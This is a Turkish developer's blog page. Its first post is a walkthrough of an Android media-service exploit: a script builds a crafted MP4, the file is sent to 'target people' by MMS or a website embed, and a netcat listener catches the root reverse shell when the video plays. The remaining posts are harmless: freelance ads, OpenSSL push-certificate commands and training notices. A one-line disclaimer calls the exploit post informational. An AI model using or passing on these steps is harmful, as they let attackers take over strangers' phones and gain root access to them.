Murat Şişman

Senior Mobile Developer & Cyber Security Researcher (Sigint)


 

Android Telefonlarınız Güvende mi?

September 17, 2016, admin0 Comments

Android işletim sistemine sahip Telefon veya tabletleriniz çok basit bir yöntem ile başkaları tarafından ele geçirilebilir. İşletim sistemindeki Media servisindeki açıktan faydalanılarak geliştirilen Exploit ile yalnızca bir MP4 videosunu çalıştırmanız hackerların cihazınızda ROOT yetkisine sahip olması için yeterli.

Exploit Kullanımı


mp4.py dosyadı ile hedef cihazlarda çalıştırılacak olan MP4 dosyasını yaratıyoruz.

-bash-4.2# python mp4.py -c 192.168.1.10 -p 7777 -o video.mp4
[*] Saving crafted MP4 to video.mp4 …
-bash-4.2#

Daha sonra oluşturulan video.mp4 dosyasını MMS yardımıyla veya web sitesine embed ederek linkini hedef kişilere gönderiyoruz. Hedef videoyu başlatmak istediğinde 192.168.1.10 olarak belirttiğimiz kendi cihazımıza 7777 portundaki shell’e bağlantı kuracaktır

Netcat ile Port açmak için 

-bash-4.2# nc -l -p 7777

Exploit Dosyaları

mp4.py

 

Not: Bu makaledeki içeik ve ekler tamamen bilgilendirme ve kişisel güvenliğinizi test etmeniz için hazırlanmıştır

Yazan: Murat ŞİŞMAN

Freelance iOS & Android Developer

September 11, 2015, admin0 Comments

Murat ŞİŞMAN, Freelance olarak iOS ve Android Uygulamaları geliştirmektedir.

Halen birçok kurum ile freelance developer olarak çalışmalarını sürdürmektedir. Bir mobil uygulamanın kodlanması, Grafik tasarımının oluşturulması, veritabanı yapısının oluşturulması, php Json webService gibi işlemlerinin tüm bölümlerinde müşterilerine profesyonel hizmet sunmaktadır.

Ayrıntılı bilgi için

info@muratsisman.com

0090 532 4747869

 

Push Notification Sertifikası oluşturma

February 2, 2015, admin0 Comments

Apple Push Notification işlemlerinde kullanmanız için gerekli olan sertifikayı oluşturmak için aşağıdaki komutları kullanabilirsiniz.

openssl x509 -in aps_development.cer -inform der -out PushChatCert.pem
openssl pkcs12 -nocerts -out PushChatKey.pem -in PushChatKey.p12
cat PushChatCert.pem PushChatKey.pem > ck.pem

ck.pem dosyasını sunucunuza aktararak kullanabilirsiniz.

Not: Aşağıdaki komutları kullanmadan önce developer.apple.com adresinden AppId Notification sertifikanızı oluşturup bilgisayarınızdan export etmelisiniz.

Freelance iOS Developer

June 9, 2014, admin0 Comments

Murat Şişman;
2008 yılından beri iOS ve Android Uygulama Geliştirme alanında bireysel ve kurumsal projeler gerçekleştirmiş olup birçok banka ve kurumsal firmalara bu konuda eğitimler vermektedir. Unity3D ile Volkicar ve SLX Race gibi 3boyutlu oyunlar geliştirmekte olup; Türkiye’de en çok mobil uygulamaya sahip olan kişidir. Yapmış olduğu uygulamalar Türkiye çapında 1.500.000 üzerinde kullanıcı tarafından aktif olarak kullanılmaktadır. Milli Güvenlik adlı Siber Güvenlik Platformu olan www.milliguvenlik.org web sitesinin sahibi olup MG-Linux adında bir Linux dağıtımı mevcuttur. Mobil Güvenlik ve Casusluk konularında eğitim vermekte olup Kripto Paralar alanında da çalışmalar gerçekleştirmektedir. www.bitcointurkborsasi.com adlı Bitcoin Borsa sitesinin sahibidir.

iOS Uygulama yaptırmak istiyorsanız, profesyonel olarak freelance yazılım geliştirme hizmet teklifi alabilirsiniz. Fiyat teklifi almak için eposta ile iletişime geçebilirsiniz.
E-Posta: info@muratsisman.com

iOS Uygulama Geliştirme Eğitimleri

November 1, 2013, admin0 Comments

iPhone iOS Uygulama Geliştirme Eğitimleri devam ediyor.

36 saat sonunda istediğiniz her türlü fonksiyonu kullanarak uygulama geliştirebileceğiniz bireysel özel eğitimler ile dilediğiniz uygulamayı yapma yeteneğine sahip olabileceksiniz.

Read More